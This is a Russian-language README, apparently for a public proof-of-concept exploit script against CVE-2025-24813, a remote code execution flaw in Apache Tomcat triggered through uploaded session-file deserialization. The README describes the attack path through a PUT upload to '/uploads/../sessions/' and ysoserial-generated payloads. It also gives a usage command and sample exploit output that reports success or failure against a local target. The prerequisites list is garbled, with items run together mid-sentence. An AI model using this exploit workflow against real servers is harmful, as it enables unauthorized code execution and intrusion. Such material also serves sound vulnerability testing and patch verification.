
Этот репозиторий содержит автоматизированный скрипт Proof of Concept (PoC) для эксплуатации **CVE-2025-24813** — уязвимости удалённого выполнения кода (RCE) в Apache Tomcat. Уязвимость позволяет злоумышленнику загрузить вредоносную сериализованную полезную нагрузку на сервер, что приводит к произвольному выполнению кода через десериализацию при выполнении определённых условий.
CVE-2025-24813 — это теоретическая уязвимость RCE в Apache Tomcat, которая использует некорректную обработку загруженных файлов сессий и механизмов десериализации. Загружая специально созданную нагрузку в доступную для записи директорию (например, /uploads/../sessions/), атакующий может инициировать десериализацию, что приводит к выполнению произвольных команд на целевом сервере.
Для успешной эксплуатации уязвимости с помощью данного PoC должны быть выполнены следующие условия:
/index.jsp) и инициировать десериализацию нагрузки.ysoserial или компиляции Java-нагрузок.ysoserial файл ysoserial.jar должен быть доступен локально.python CVE-2025-24813.py <target_url> [options]
[+] Server is writable via PUT: http://localhost:8081/check.txt
[*] Session ID: absholi7ly
[+] Payload generated successfully: payload.ser
[+] Payload uploaded with status 409 (Conflict): http://localhost:8081/uploads/../sessions/absholi7ly.session
[+] Exploit succeeded! Server returned 500 after deserialization.
[+] Target http://localhost:8081 is vulnerable to CVE-2025-24813!
[+] Temporary file removed: payload.ser
[+] Server is writable via PUT: http://localhost:8081/check.txt
[*] Session ID: absholi7ly
[+] Payload generated successfully: payload.ser
[-] Payload upload failed: http://localhost:8081/uploads/../sessions/absholi7ly.session (HTTP 403)
[-] Target http://localhost:8081 does not appear vulnerable or exploit failed.
[+] Temporary file removed: payload.ser